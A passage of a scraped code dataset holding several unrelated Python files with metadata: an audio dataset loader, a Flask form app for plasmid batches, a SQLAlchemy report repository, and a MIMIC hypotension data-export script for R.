files\n self.labels = labels\n self.feature = feature\n self.num_samples = 220500 # hardcoded\n self.mel_normalize = mel_normalize\n\n def _2D_normalize(self, spectrogram):\n return spectrogram / np.max(spectrogram)\n\n def _pad_or_remove(self, audio):\n length = len(audio)\n if length == self.num_samples:\n return audio\n elif length > self.num_samples:\n return audio[:self.num_samples]\n else:\n delta = self.num_samples - length\n delta = self.num_samples - length\n return np.pad(audio, (0, delta), 'constant')\n\n def __len__(self):\n return len(self.files)\n\n def __getitem__(self, idx):\n filename = self.files[idx]\n label = self.labels[idx]\n audio, sr = sf.read(filename) \n\n if self.feature == 'waveform':\n audio = self._pad_or_remove(audio)\n return torch.tensor(audio), label\n\n elif self.feature == 'mel':\n audio = self._pad_or_remove(audio)\n spectrogram = melspectrogram(y=audio, sr=sr, power=1)\n if self.mel_normalize:\n spectrogram = self._2D_normalize(spectrogram)\n return torch.FloatTensor(spectrogram), label\n\n class ESC10Exposure(Dataset):\n def __init__(self, \n exposure_files,\n exposure_label,\n feature='waveform',\n mel_normalize=True,\n ):\n super().__init__()\n assert feature in ['waveform', 'mel']\n\n self.exposure_files = exposure_files\n self.exposure_label = exposure_label\n self.feature = feature\n self.num_samples = 220500 # hardcoded\n self.mel_normalize = mel_normalize\n\n def _2D_normalize(self, spectrogram):\n return spectrogram / np.max(spectrogram)\n\n def _pad_or_remove(self, audio):\n length = len(audio)\n if length == self.num_samples:\n return audio\n elif length > self.num_samples:\n return audio[:self.num_samples]\n else:\n delta = self.num_samples - length\n delta = self.num_samples - length\n return np.pad(audio, (0, delta), 'constant')\n\n def __len__(self):\n return len(self.exposure_files)\n\n def __getitem__(self, idx: int):\n filename = self.exposure_files[idx]\n audio, sr = sf.read(filename)\n\n if self.feature == 'waveform':\n audio = self._pad_or_remove(audio)\n return torch.tensor(audio), self.exposure_label\n elif self.feature == 'mel':\n audio = self._pad_or_remove(audio)\n spectrogram = melspectrogram(y=audio, sr=sr, power=1)\n if self.mel_normalize:\n spectrogram = self._2D_normalize(spectrogram)\n\n return torch.FloatTensor(spectrogram), self.exposure_label\n\n def __init__(self, \n path, \n feature='waveform',\n mel_normalize=True,\n transform=None,\n target_transform=None,\n transforms=None,\n exposure_size=10,\n initial_K=4\n ):\n super().__init__()\n assert feature in ['waveform', 'mel']\n\n self.split = 'train'\n self.path = os.path.join(path, 'train')\n self.feature = feature\n self.mel_normalize = mel_normalize\n self.num_samples = 220500 # hardcoded\n self.files_per_class = 30 # hardcoded\n self.exposure_size = exposure_size\n self.exposure_per_class = self.files_per_class // exposure_size\n\n self.initial_K = initial_K\n\n # These are the initial K classes that the model trains on \n self.initial_classes = random.sample(range(0, 10), self.initial_K)\n\n # audio_files[i] is the list of all exposures of class i (length exposure_per_class)\n # audio_files[i][j] is the list of all audios of exposure j of class i (length exposure_size)\n self.audio_files = {}\n # This contains indices(class_idx, exposure_idx) of exposures that are not returned yet\n self.exposure_remain_idx = []#[self.exposure_per_class] * 10\n\n for i in range(10):\n self.audio_files[i] = [[] for _ in range(self.exposure_per_class)]\n for j in range(self.exposure_per_class):\n self.exposure_remain_idx.append((i, j))\n\n for i, subdir in enumerate(\n ['010 - Fire crackling', '001 - Dog bark', '002 - Rain', '003 - Sea waves', \n '004 - Baby cry', '005 - Clock tick', '006 - Person sneeze', '007 - Helicopter', \n '008 - Chainsaw', '009 - Rooster'\n ]\n ):\n fi = 0\n for f in os.listdir(os.path.join(self.path, subdir)):\n ext = os.path.splitext(f)[-1].lower()\n if ext != '.ogg':\n continue\n else:\n self.audio_files[i][fi//self.exposure_size].append(os.path.join(self.path, subdir, f))\n fi += 1\n\n # Shuffle exposures \n random.shuffle(self.exposure_remain_idx)\n self.exposure_max = len(self.exposure_remain_idx) - self.initial_K\n\n\n def get_initial_set(self, initial_classes=None):\n '''\n Return an ESC10ExposureGenerator.ESC10InitialClasses object, which is a Dataset\n that contains one exposure for each one of the initial classes\n '''\n\n if initial_classes != None:\n assert len(initial_classes) == self.initial_K\n self.initial_classes = initial_classes\n\n files = []\n labels = []\n for c in self.initial_classes:\n # randomly choose an exposure of the class\n r = random.randint(0, self.exposure_per_class-1)\n\n files += self.audio_files[c][r]\n labels += [c] * self.exposure_size\n \n self.exposure_remain_idx.remove((c, r))\n\n return ESC10ExposureGenerator.ESC10InitialClasses(files=files, labels=labels,\n feature=self.feature, mel_normalize=self.mel_normalize)\n\n def __len__(self):\n return self.exposure_max\n\n def __getitem__(self, idx: int):\n '''\n Randomly return an ESC10ExposureGenerator.ESC10Exposure object, which is a Dataset\n that contains self.exposure_size audios\n '''\n\n c, ei = self.exposure_remain_idx.pop(0)\n return ESC10ExposureGenerator.ESC10Exposure(exposure_files=self.audio_files[c][ei], \n exposure_label=c,\n feature=self.feature,\n mel_normalize=self.mel_normalize\n )\n\n\n\n\n", "repo_name": "xi-j/Incremental_Acoustic_Classification", "sub_path": "project/src/ESC10.py", "file_name": "ESC10.py", "file_ext": "py", "file_size_in_byte": 10789, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 64, "usage_type": "call"}, {"api_name": "soundfile.read", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 127, "usage_type": "call"}, {"api_name": "soundfile.read", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 139, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 148, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 176, "usage_type": "call"}, {"api_name": "soundfile.read", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 187, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 221, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 250, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 268, "usage_type": "call"}]}
+{"seq_id": "13189846044", "text": "\"\"\"Flask app serving submission form and download pages\"\"\"\n\nfrom flask import Flask, g, render_template, request, send_file\nimport batch\nimport locus\nimport os\nimport shutil\n\napp = Flask(__name__)\nfiles = ['primers.csv', 'idt_import.csv', 'plasmids.zip', 'loci.zip']\nmarker_keys = [k for k in batch.MAP_PLASMID_PATH.keys() if k.startswith('Lox')]\nindex_kw = {'mod_keys':batch.MAP_MOD_TYPE.keys(),\n 'assembly_keys':batch.MAP_ASSEMBLY_METHOD.keys(),\n 'marker_keys':marker_keys}\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html', **index_kw)\n\n@app.route('/download', methods=['GET', 'POST'])\ndef download():\n if request.method == 'POST':\n batch_kw = {k:v for k,v in request.form.items()\n if not k.startswith('start')}\n b = batch.Batch(**batch_kw)\n shutil.rmtree(batch.paths.OUTPUT_PREFIX)\n os.mkdir(batch.paths.OUTPUT_PREFIX)\n b.write_primers_csv()\n b.assign_numbers(request.form['start_oligos'])\n b.write_idt_csv()\n b.write_plasmids_zip(request.form['start_plasmids'])\n b.write_loci_zip()\n rows = b.list_operations()\n return render_template('download.html', files=files, rows=rows)\n return render_template('index.html', **index_kw)\n\ndef test():\n with app.test_request_context('/', method='GET'):\n assert request.path == '/'\n assert request.method == 'GET'\n with app.test_request_context('/', method='POST'):\n assert request.path == '/download'\n assert request.method == 'POST'\n\nif __name__=='__main__':\n app.run()\n test()\n", "repo_name": "thomasvstevens/locusmod", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1625, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "batch.MAP_PLASMID_PATH.keys", "line_number": 11, "usage_type": "call"}, {"api_name": "batch.MAP_PLASMID_PATH", "line_number": 11, "usage_type": "attribute"}, {"api_name": "batch.MAP_MOD_TYPE.keys", "line_number": 12, "usage_type": "call"}, {"api_name": "batch.MAP_MOD_TYPE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "batch.MAP_ASSEMBLY_METHOD.keys", "line_number": 13, "usage_type": "call"}, {"api_name": "batch.MAP_ASSEMBLY_METHOD", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.request.form.items", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "batch.Batch", "line_number": 25, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 26, "usage_type": "call"}, {"api_name": "batch.paths", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "batch.paths", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}]}
+{"seq_id": "74238097448", "text": "from backend.db import aosp_db_engine\nfrom backend.model.aoc_report import AOSPAoCReport\nfrom backend.model.project import AOSPProject\n\nfrom sqlalchemy import select, and_, or_, false, true\nfrom sqlalchemy.orm import Session\n\nfrom typing import List\n\n\ndef get_all_reports(limit: int = 100, skip: int = 0) -> List[AOSPAoCReport]:\n with Session(aosp_db_engine) as session:\n return session.query(AOSPAoCReport).limit(limit).offset(skip).all()\n\n\ndef get_report_by_id(id_: int) -> AOSPAoCReport:\n with Session(aosp_db_engine) as session:\n return session.query(AOSPAoCReport).get(id_)\n\n\ndef get_reports_by_project(project: AOSPProject) -> List[AOSPAoCReport]:\n stmt = select(AOSPAoCReport).where(AOSPAoCReport.project_id == project.id)\n with Session(aosp_db_engine) as session:\n return session.scalars(stmt)\n\n\ndef get_reports_by_project_id(project_id: int) -> List[AOSPAoCReport]:\n stmt = select(AOSPAoCReport).where(AOSPAoCReport.project_id == project_id)\n with Session(aosp_db_engine) as session:\n return session.scalars(stmt)\n\n\ndef search(project_id: int | List[int] = None, aoc: str | List[str] = None):\n and_clauses = []\n if project_id is None:\n project_id = []\n list_project_ids = project_id if isinstance(project_id, list) else [project_id]\n if list_project_ids:\n and_clauses.append(\n or_(\n false,\n *[AOSPAoCReport.project_id == proj_id for proj_id in list_project_ids]\n )\n )\n if aoc is None:\n aoc = []\n list_aocs = aoc if isinstance(aoc, list) else [aoc]\n if aoc:\n and_clauses.append(\n or_(false, *[AOSPAoCReport.aoc.like(aoc_elem) for aoc_elem in list_aocs])\n )\n stmt = select(AOSPAoCReport).where(and_(true, *and_clauses))\n with Session(aosp_db_engine) as session:\n reports = []\n for scalar in session.scalars(stmt):\n reports.append(scalar)\n return reports\n", "repo_name": "davitabosa12/aoc-analysis-web", "sub_path": "backend/repository/aosp_aoc_report.py", "file_name": "aosp_aoc_report.py", "file_ext": "py", "file_size_in_byte": 1971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.orm.Session", "line_number": 12, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 12, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 13, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 11, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 17, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 18, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 16, "usage_type": "name"}, {"api_name": "backend.model.project.AOSPProject", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 22, "usage_type": "call"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 22, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.project_id", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 23, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 23, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 28, "usage_type": "call"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 28, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.project_id", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 29, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 29, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 33, "usage_type": "name"}, {"api_name": "sqlalchemy.or_", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.false", "line_number": 41, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.project_id", "line_number": 42, "usage_type": "attribute"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 42, "usage_type": "name"}, {"api_name": "sqlalchemy.or_", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.false", "line_number": 50, "usage_type": "argument"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.aoc.like", "line_number": 50, "usage_type": "call"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport.aoc", "line_number": 50, "usage_type": "attribute"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 52, "usage_type": "call"}, {"api_name": "backend.model.aoc_report.AOSPAoCReport", "line_number": 52, "usage_type": "argument"}, {"api_name": "sqlalchemy.and_", "line_number": 52, "usage_type": "call"}, {"api_name": "sqlalchemy.true", "line_number": 52, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 53, "usage_type": "call"}, {"api_name": "backend.db.aosp_db_engine", "line_number": 53, "usage_type": "argument"}]}
+{"seq_id": "35141523793", "text": "# This is a post processing file for the output of data_clean.py to put the python objects into form that\n# is easily read by R.\n# It takes the output from Futoma 2020, who wrote data_clean.py and puts it into a form\n# that the script mimic.R can read for modeling.\n# Also, we binarize action\n\nimport numpy as np\nimport pickle\nimport pandas as pd\nimport pdb\nimport os\nimport shutil\n\npath = '/Users/anonymous/Box/MIMIC/mimic-iii-v1-4/hypotension-RL/model-data2'\nos.chdir(path)\nexp_name = \"\"\nfluidAndVaso = 0\n\n# creates multistage episodes\n\ndef make_multistage(d, name, maxT, at):\n # which states are floats? useful for putting states into np arrays, which only take floats/ints\n isfloatorint = [(isinstance(el, float) or isinstance(el, int)) for el in d['all_states'][0][0]]\n float_names = np.array([el for el in d['state_var_names']])[isfloatorint]\n pd.DataFrame({\"float_names\":float_names}).to_csv(\"float_names.csv\")#,index=False)\n # start with hypotensive measurement\n states=[]\n\n actions = []\n rewards = []\n ids = []\n\n print(\"JUST TAKING FIRST \",maxT,\" DECISION POINTS\")\n\n for (ss,aa,rr,id) in zip(d['all_states'],d['all_actions'],d['all_rewards'],d['all_IDs']):\n # only if at least 2 state measurements\n\n states.append(ss[0:][0:maxT])\n \n if fluidAndVaso:\n actions.append([1*(el>0) for el in aa[0:][0:maxT]])\n else:\n actions.append([1*(el>3) for el in aa[0:][0:maxT]])\n rewards.append(rr[0:][0:maxT])\n ids.append(id)\n\n pd.DataFrame(actions).to_csv((name+\"multistage_actions.csv\"))#,index=False)\n pd.DataFrame(rewards).to_csv((name+\"multistage_rewards.csv\"))#,index=False)\n \n #atkeys = [el for el in at.keys()]\n atkeys = d['all_IDs']\n\n #assert (atkeys == d['all_IDs'])\n Traj_times = at#[at[i] for i in atkeys]\n times = []\n vasoamts = []\n vaso_norm_amounts = []\n for atel in at:\n times.append(atel[0:maxT])\n #vasoamts.append(at[id].Vasopressor_normed_amt.values[0:maxT])\n\n pd.DataFrame(times).to_csv((name+\"multistage_times.csv\"))#,index=False)\n #pd.DataFrame(vasoamts).to_csv((name+\"multistage_vasoamts.csv\"))#,index=False)\n\n \n # trying to put trajectories into an object R can read\n # ended up instead just sending each time step to a different csv\n # send each time step to different csv (avoid reading numpy arrays into R)\n # todo: not just floats anymore\n\n\n lens=[len(el) for el in states]\n N=len(states)\n T = max(lens)\n K = states[0][0].shape[0]\n states_floats = []\n\n for n in range(0,N):\n states_floats_n = []\n for t in range(0,len(states[n])):\n states_floats_n.append(states[n][t][isfloatorint])\n states_floats.append(states_floats_n)\n\n N=len(states_floats)\n T = max(lens)\n K = states_floats[0][0].shape[0]\n ne = np.empty((N,T,K))\n ne[:] = np.NAN\n\n for n in range(0,N):\n for t in range(0,len(states_floats[n])):\n for k in range(0,K):\n ne[n,t,k] = states_floats[n][t][k]\n\n\n newpath = r'stages'+name \n if os.path.exists(newpath): shutil.rmtree(newpath)\n os.makedirs(newpath)\n for t in range(0,maxT):\n tdf = pd.DataFrame(ne[:,t,:])\n tdf.columns = float_names\n time_name = \"./\"+newpath+\"/\"+str(t) + \".csv\"\n tdf.to_csv(time_name)#,index=False)\n print(\"ms saved ok\")\n return [ids,actions,rewards,ne]\n\n\n# maximum number of decision points to take in the trajectories starting at hypotension onset\n# should be number of states time steps - 1 , or number of action or reward time steps\nmaxT = 4\n\n\nd=np.load('states_actions_rewards_IDs.npz',allow_pickle=True)\nidoi = 51\n# can use the id below to check\nid_check = [el for el in d['all_IDs']][idoi]\nmos=[el for el in d['all_states'][idoi]]\nmos=[el[19] for el in mos]\n\n\n\n\nmoa=[el for el in d['all_actions'][idoi]]\nmor=[el for el in d['all_rewards'][idoi]]\n\n\n\nfirst_low_maps = pickle.load(open('all_first_low_map.p','rb'))\ns=pickle.load(open('all_states.p','rb')) #used?\nprint([el for el in d.keys()])\n\n#no_ind = [(('ind' not in el) and ('last_' not in el)) for el in d['state_var_names']]\n# by data_clean.py, actions 0-3 are 0 vaso\n# hence we need to check for each visit whether there is a number greater than 3\n## why some zero. if no action.\nprint(\"n\",len(d['all_actions']))\n\n#this should check for emptiness, not take max\nmxs=[]\nfor el in d['all_actions']:\n\ttry:\n\t\tmxs.append(np.max(el))\n\texcept: \n\t\tmxs.append(np.NAN)\n\ntakes = [~np.isnan(el) for el in mxs]\ndid_sub=d['all_IDs'][takes]\ndst_sub=d['all_states'][takes]\ndac_sub=d['all_actions'][takes]\ndre_sub=d['all_rewards'][takes]\ndti_sub=d['all_action_times'][takes]\n\n[el for el in d['all_IDs']][42]\n\nd={'all_states':dst_sub,'all_actions':dac_sub,'all_rewards':dre_sub,\n'all_IDs':did_sub,'all_action_times':dti_sub,'state_var_names':d['state_var_names']}\nprint(\"n\",len(d['all_actions']))\n\nidoi = 19\n# can use the id below to check\nid_check = [el for el in d['all_IDs']][idoi]\nmos=[el for el in d['all_states'][idoi]]\nmos=[el[19] for el in mos]\nmoa=[el for el in d['all_actions'][idoi]]\nmor=[el for el in d['all_rewards'][idoi]]\n\n# now 201098 is index 49, which would be index 50 in R \n#[el for el in d['all_IDs']][49]\n\n# if greater than three, implies vaso given\n# if greater than zero, either vaso or fluid given\n\n\nif fluidAndVaso:\n gt3=[np.max(el)>0 for el in d['all_actions']]\nelse:\n gt3=[np.max(el)>3 for el in d['all_actions']]\nnp.mean(gt3) #.27. So about 1/4 of time, use vaso. check with Joe's summary\n# Joe has more vaso. It looks like maybe 3/4 vaso..\n\n#fs = []\n#for (sts,id) in zip(d['all_states'],d['all_IDs']):\n#\tpdb.set_trace()\n#\tfs.append(sts[first_low_maps[id]])\n\nall_states_list = [el for el in d['all_states']]\n\nfs = []\nfor (id,el) in zip(d['all_IDs'],d['all_states']):\n try:\n fs.append(el[0])\n except:\n fs.append([np.NAN])\n\n#fs=[el[0] for el in d['all_states']]\n#fs_noind=[el[no_ind] for el in fs]\n#varsnames_noind=d['state_var_names'][no_ind]\nvarsnames = d['state_var_names']\n\n#mean_rewards = [np.mean(el) for el in d['all_rewards']]\n\nmean_rewards = []\nfor el in d['all_rewards']:\n try: \n mean_rewards.append(np.mean(el))\n except:\n print(\"in except\")\n mean_rewards.append(np.NAN)\n\nnp.mean(mean_rewards)\nnp.max(mean_rewards)\nnp.min(mean_rewards)\n\nfs_arr = np.array(fs)\nsdf = pd.DataFrame(fs)\nsdf.columns = varsnames\nsdf.to_csv(\"first_states.csv\")#,index=False)\n\nls = []\nfor el in d['all_states']:\n try:\n ls.append(el[-1])\n except:\n ls.append(np.NAN)\n #[el[-1] for el in d['all_states']]\n\n#ls_noind=[el[no_ind] for el in ls]\n\nls_arr = np.array(ls)\nsdf = pd.DataFrame(ls)\nsdf.columns = varsnames\nsdf.to_csv(\"last_states.csv\")#,index=False)\n\n# don't set index to false, because if so R will remove blanks\npd.DataFrame({'r':mean_rewards}).to_csv('mean_rewards.csv')#,index=False)\ngt3=[int(el) for el in gt3]\npd.DataFrame({'a':gt3}).to_csv('vaso.csv')#,index=False)\n\n\nat=d['all_action_times']#pickle.load(open(\"all_raw_actions_times.p\",\"rb\"))\natkeys = d['all_IDs']#[el for el in at.keys()]\n\nms=make_multistage(d, exp_name,maxT=maxT,at=at)\n\nTs=[np.max(el) for el in at]\n\npd.DataFrame({'Ts':Ts}).to_csv('Ts.csv')#,index=False)\n\npdb.set_trace()\ntgt24 = {}\nfor id in atkeys: tgt24[id] = at[id].Times>24\n\n\n#fluid_starts = fluids_dat['ICUSTAY_ID'].searchsorted(final_ICU_IDs,'left')\n\n# aggregate first and last 12 hours\n# just one way to make a 2 stage decision\n# I wonder if more stable\ncp=1\nif cp ==1:\n changepoints = {}\n for id in atkeys: \n changepoints[id] = tgt24[id].searchsorted('True','left')\n #tgt24[atkeys[2]].searchsorted('True','left')\n states=[el for el in d['all_states']]\n ids=[el for el in d['all_IDs']]\n rewards = [el for el in d['all_rewards']]\n actions = [el for el in d['all_actions']]\n\n ss = list()\n for (id,state) in zip(ids,states):\n if changepoints[id] < len(state):\n ss.append(state[changepoints[id]])\n else:\n ss.append(np.NAN)\n\n #sss = \n\n #pd.DataFrame()\n\n rr = list()\n for (i,id) in enumerate(ids):\n tmask = tgt24[id][1:-1]\n rr.append(\n [np.mean(rewards[i][~tmask]),np.mean(rewards[i][tmask])]\n )\n\n aa = list()\n for (i,id) in enumerate(ids):\n tmask = tgt24[id][1:-1]\n aa.append(\n [np.sum(actions[i][~tmask]>3)>0,np.sum(actions[i][tmask]>3)>0]\n ) \n\n\n tgt24[ids[2]]\n\n\n\n\n\n### end of multistage data generation\n \n#before_sts = pd.DataFrame(np.array(mean_before_hyps))\n\n#before_sts.columns = float_names\n#before_sts.to_csv(\"mean_before_hyp_floats.csv\")#,index=False)\n\n#np.save(\"hyp_s\",ne)\n\n#print(\"n (more than 2 states - problematic)\",len(hyp_ids))\n\n# first and last state (eg, if going to treat whole trajectory)\n# as one decision\n\nhyp_fs = [el[0] for el in hyp_states]\nhyp_ls = [el[-1] for el in hyp_states]\n\nhyp_mxs=[]\nfor el in hyp_actions:\n try:\n hyp_mxs.append(np.max(el))\n except: \n #print(\"exception\")\n hyp_mxs.append(np.NAN)\n\n# whether ever given vaso\n\nhyp_vaso=[el>3 for el in hyp_mxs]\npctv = np.mean(hyp_vaso)\n\n# average reward\n\nhyp_mean_rewards = [np.mean(el) for el in hyp_rewards]\nhyp_first_rewards = []\nfor el in hyp_rewards:\n \n if len(el)>=1:\n hyp_first_rewards.append(el[0]) \n else:\n\n hyp_first_rewards.append(np.NAN)\nhyp_first_actions = []\nfor el in hyp_actions:\n if len(el)>=1:\n hyp_first_actions.append(el[0])\n else:\n hyp_first_actions.append(np.NAN)\n\n# overall mean\nprint(\"prop w mean reward small\",np.mean([el<0 for el in mean_rewards]))\nprint(\"prop given vaso\",np.mean(gt3))\n\n# hypo mean\nhyp_first_vaso = [el>3 for el in hyp_first_actions]\npctrlz = np.mean([el<0 for el in hyp_mean_rewards])\nprint(\"hypo prop given vaso\",pctv)\nprint(\"hypo prop r<0\",pctrlz)\n\n# hypo first rewards,actins\nprint(\"hypo prop w first reward small\",np.mean([el<0 for el in hyp_first_rewards]))\nprint(\"hypo prop given vaso first\",np.mean([el>3 for el in hyp_first_actions]))\n\n\n# some rewards are nan\n# ecause they only have one state after hypotension.\n# so no second state to measure a reward\n# we will therefore subset by those with at least 1 state after hypo\n\n# actually, don't do this. keep in form with multistage above\n\nls = [len(el) for el in hyp_states]\nstlg1 = [el>1 for el in ls]\n\n\nhyp_as=pd.DataFrame({\"a\":hyp_vaso})#[stlg1]\nhyp_as.to_csv(\"hyp_a.csv\")#,index=False)\n\nhyp_first_as=pd.DataFrame({\"a\":hyp_first_vaso})#[stlg1]\nhyp_first_as.to_csv(\"hyp_first_a.csv\")#,index=False)\n\n\nhyp_rs = pd.DataFrame({\"r\":hyp_mean_rewards})#[stlg1]\nhyp_rs.to_csv(\"hyp_r.csv\")#,index=False)\n\nhyp_first_rs = pd.DataFrame({\"r\":hyp_first_rewards})#[stlg1]\nhyp_first_rs.to_csv(\"hyp_first_r.csv\")#,index=False)\n\n#hyp_fs_noind=[el[no_ind] for el in hyp_fs]\nfsdf=pd.DataFrame(hyp_fs)#[stlg1]\nfsdf.columns = varsnames\nfsdf.to_csv(\"hyp_fs.csv\")#,index=False)\n#hyp_ls_noind=[el[no_ind] for el in hyp_ls]\nlsdf=pd.DataFrame(hyp_ls)#[stlg1]\nlsdf.columns = varsnames\nlsdf.to_csv(\"hyp_ls.csv\")#,index=False)\n\npdb.set_trace()\nprint(\"NEED TO GO BACK AD DEAL WITH NULL ACTIONS\")\npdb.set_trace()\n\n", "repo_name": "samuelweisenthal/relative_sparsity", "sub_path": "np_load.py", "file_name": "np_load.py", "file_ext": "py", "file_size_in_byte": 11131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.chdir", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.exists", 